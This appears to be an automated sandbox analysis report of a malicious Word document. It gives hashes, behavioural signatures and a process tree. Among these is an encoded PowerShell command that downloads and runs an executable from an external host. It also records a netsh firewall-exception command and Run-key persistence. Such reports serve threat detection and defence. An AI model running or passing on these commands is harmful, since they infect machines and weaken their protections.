Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
10-05-2021 16:02
Static task
static1
Behavioral task
behavioral1
Sample
2a8f04dd_by_Libranalysis.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
2a8f04dd_by_Libranalysis.doc
Resource
win10v20210410
General
-
Target
2a8f04dd_by_Libranalysis.doc
-
Size
43KB
-
MD5
2a8f04ddc03f8c4db0821275619b55b4
-
SHA1
8bf21477518f4f33bbd9f1a0f013302be516ea53
-
SHA256
531471184d5c8eb4ec97c12059b5bbc8f397b3749033f7fd80405a1b560fbb17
-
SHA512
27eb081ce75ae5015adc7368b109fd82b6fa7dfab627a4faa0a8cc43aa83385f75906e463b1a0cde23490f0274c150578c923c2fe3e9d2eec9e26492fd717c43
Malware Config
Extracted
http://meetthepriestessatl.com/August2020.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 412 3916 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 15 1948 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
CfMjPH.exeAddInProcess32.exepid process 3548 CfMjPH.exe 2076 AddInProcess32.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 2 IoCs
Processes:
AddInProcess32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0ef5de3f5b1fb89677ba03e41fa0a05a.exe AddInProcess32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0ef5de3f5b1fb89677ba03e41fa0a05a.exe AddInProcess32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
AddInProcess32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\0ef5de3f5b1fb89677ba03e41fa0a05a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\AddInProcess32.exe\" .." AddInProcess32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\0ef5de3f5b1fb89677ba03e41fa0a05a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\AddInProcess32.exe\" .." AddInProcess32.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
CfMjPH.exedescription pid process target process PID 3548 set thread context of 2076 3548 CfMjPH.exe AddInProcess32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3916 WINWORD.EXE 3916 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeCfMjPH.exepid process 1948 powershell.exe 1948 powershell.exe 1948 powershell.exe 3548 CfMjPH.exe 3548 CfMjPH.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exeCfMjPH.exeAddInProcess32.exedescription pid process Token: SeDebugPrivilege 1948 powershell.exe Token: SeDebugPrivilege 3548 CfMjPH.exe Token: SeDebugPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe Token: 33 2076 AddInProcess32.exe Token: SeIncBasePriorityPrivilege 2076 AddInProcess32.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
WINWORD.EXEpid process 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE 3916 WINWORD.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WINWORD.EXEcmd.execmd.exepowershell.exeCfMjPH.exeAddInProcess32.exedescription pid process target process PID 3916 wrote to memory of 412 3916 WINWORD.EXE cmd.exe PID 3916 wrote to memory of 412 3916 WINWORD.EXE cmd.exe PID 412 wrote to memory of 1032 412 cmd.exe cmd.exe PID 412 wrote to memory of 1032 412 cmd.exe cmd.exe PID 1032 wrote to memory of 1948 1032 cmd.exe powershell.exe PID 1032 wrote to memory of 1948 1032 cmd.exe powershell.exe PID 1948 wrote to memory of 3548 1948 powershell.exe CfMjPH.exe PID 1948 wrote to memory of 3548 1948 powershell.exe CfMjPH.exe PID 1948 wrote to memory of 3548 1948 powershell.exe CfMjPH.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 3548 wrote to memory of 2076 3548 CfMjPH.exe AddInProcess32.exe PID 2076 wrote to memory of 2712 2076 AddInProcess32.exe netsh.exe PID 2076 wrote to memory of 2712 2076 AddInProcess32.exe netsh.exe PID 2076 wrote to memory of 2712 2076 AddInProcess32.exe netsh.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2a8f04dd_by_Libranalysis.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AbQBlAGUAdAB0AGgAZQBwAHIAaQBlAHMAdABlAHMAcwBhAHQAbAAuAGMAbwBtAC8AQQB1AGcAdQBzAHQAMgAwADIAMAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAQwBmAE0AagBQAEgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAEMAZgBNAGoAUABIAC4AZQB4AGUA2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AbQBlAGUAdAB0AGgAZQBwAHIAaQBlAHMAdABlAHMAcwBhAHQAbAAuAGMAbwBtAC8AQQB1AGcAdQBzAHQAMgAwADIAMAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAQwBmAE0AagBQAEgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAEMAZgBNAGoAUABIAC4AZQB4AGUA3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AbQBlAGUAdAB0AGgAZQBwAHIAaQBlAHMAdABlAHMAcwBhAHQAbAAuAGMAbwBtAC8AQQB1AGcAdQBzAHQAMgAwADIAMAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAQwBmAE0AagBQAEgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAEMAZgBNAGoAUABIAC4AZQB4AGUA4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\CfMjPH.exe"C:\Users\Admin\AppData\Roaming\CfMjPH.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"6⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe" "AddInProcess32.exe" ENABLE7⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exeMD5
6a673bfc3b67ae9782cb31af2f234c68
SHA17544e89566d91e84e3cd437b9a073e5f6b56566e
SHA256978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e
SHA51272c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exeMD5
6a673bfc3b67ae9782cb31af2f234c68
SHA17544e89566d91e84e3cd437b9a073e5f6b56566e
SHA256978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e
SHA51272c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39
-
C:\Users\Admin\AppData\Roaming\CfMjPH.exeMD5
2300f1b5fea0e1d327cb2d45fed04af2
SHA12d057ca49419bc209d81d7cd7f60cf7691d3ea15
SHA2566e8faa25a4a9df217eff05a0563d8d2628d229b0402ccf4010b35b7ebd1f751c
SHA51237220e2967fec4f54df134d5d1ac7985fedf24a5e06bd1a7d4da85fcc12d08c2fdc4ff4838b7db18c4b452be700ef90203de7bd563f1cd82e4a087e760d1e163
-
C:\Users\Admin\AppData\Roaming\CfMjPH.exeMD5
2300f1b5fea0e1d327cb2d45fed04af2
SHA12d057ca49419bc209d81d7cd7f60cf7691d3ea15
SHA2566e8faa25a4a9df217eff05a0563d8d2628d229b0402ccf4010b35b7ebd1f751c
SHA51237220e2967fec4f54df134d5d1ac7985fedf24a5e06bd1a7d4da85fcc12d08c2fdc4ff4838b7db18c4b452be700ef90203de7bd563f1cd82e4a087e760d1e163
-
memory/412-179-0x0000000000000000-mapping.dmp
-
memory/1032-180-0x0000000000000000-mapping.dmp
-
memory/1948-184-0x000002D230B46000-0x000002D230B48000-memory.dmpFilesize
8KB
-
memory/1948-181-0x0000000000000000-mapping.dmp
-
memory/1948-182-0x000002D230B40000-0x000002D230B42000-memory.dmpFilesize
8KB
-
memory/1948-183-0x000002D230B43000-0x000002D230B45000-memory.dmpFilesize
8KB
-
memory/2076-190-0x000000000040747E-mapping.dmp
-
memory/2076-194-0x0000000004CD0000-0x00000000051CE000-memory.dmpFilesize
5.0MB
-
memory/2712-193-0x0000000000000000-mapping.dmp
-
memory/3548-189-0x0000000004EB0000-0x00000000053AE000-memory.dmpFilesize
5.0MB
-
memory/3548-185-0x0000000000000000-mapping.dmp
-
memory/3548-188-0x0000000004EB0000-0x00000000053AE000-memory.dmpFilesize
5.0MB
-
memory/3916-123-0x00007FFC09790000-0x00007FFC0B685000-memory.dmpFilesize
31.0MB
-
memory/3916-122-0x00007FFC0B690000-0x00007FFC0C77E000-memory.dmpFilesize
16.9MB
-
memory/3916-114-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3916-118-0x00007FFC11D50000-0x00007FFC14873000-memory.dmpFilesize
43.1MB
-
memory/3916-119-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3916-117-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3916-116-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3916-115-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB